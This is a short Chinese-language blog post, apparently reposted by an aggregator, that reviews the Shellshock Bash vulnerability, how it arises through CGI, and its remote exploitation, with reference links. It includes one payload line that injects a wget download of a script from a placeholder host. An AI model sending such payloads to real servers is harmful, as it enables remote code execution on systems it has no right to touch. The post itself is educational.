shellshock漏洞回顾
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了shellshock漏洞回顾相关的知识,希望对你有一定的参考价值。
review
- 定位漏洞缘由
部分大佬认为uCGI技术的普及是个错误,正是因为CGI技术的不合理之处,Shellshock才有机可乘。
CGI技术是Web技术刚兴起的时候发明的,它是最早的可以创建动态网页内容的技术之一。它会把一个HTTP请求转化为一次shell调用。CGI (Common Gateway Interface),是一种基于浏览器的输入,在Web服务器上运行程序的方法。
- 风险预估
起初以为这个仅仅是个本地执行的漏洞。后面发现亦可作为远程×××。
远程×××面:正是由于后台处理程序不仅仅可以用php、Python、Perl等脚本来接受请求、解释执行、响应客户端,当然还可以用Bash脚本来解释执行用户提交的GET或POST请求。
Bash漏洞其实是非常经典的“注入式×××”,也就是可以向 bash注入一段命令,从bash1.14 到4.3都存在这样的漏洞。
() { :;}; wget http://www.XXX.com/testvul.sh
对于利用Bash脚本处理用户请求的网站,×××者可以精心伪造数据,通过网络传到一台服务器上,直接或间接触发一个bash脚本,这样就可以远程执行恶意代码。
通过特定格式的指令设置环境变量,进而在执行bash脚本时会先执行把我们设置的环境变量执行。
shellshock分析与回顾:
http://www.myhack58.com/Article/html/3/8/2014/54877_13.htm
shellshock真实案列:
http://www.freebuf.com/articles/system/45390.html
×××前提:必须得在有漏洞的机器上执行我们的bash代码。
课程参考:
https://www.shiyanlou.com/courses/230
以上是关于shellshock漏洞回顾的主要内容,如果未能解决你的问题,请参考以下文章
Shellshock远程命令注入(CVE-2014-6271)漏洞复现
docker小试牛刀之bash_shellshock漏洞复现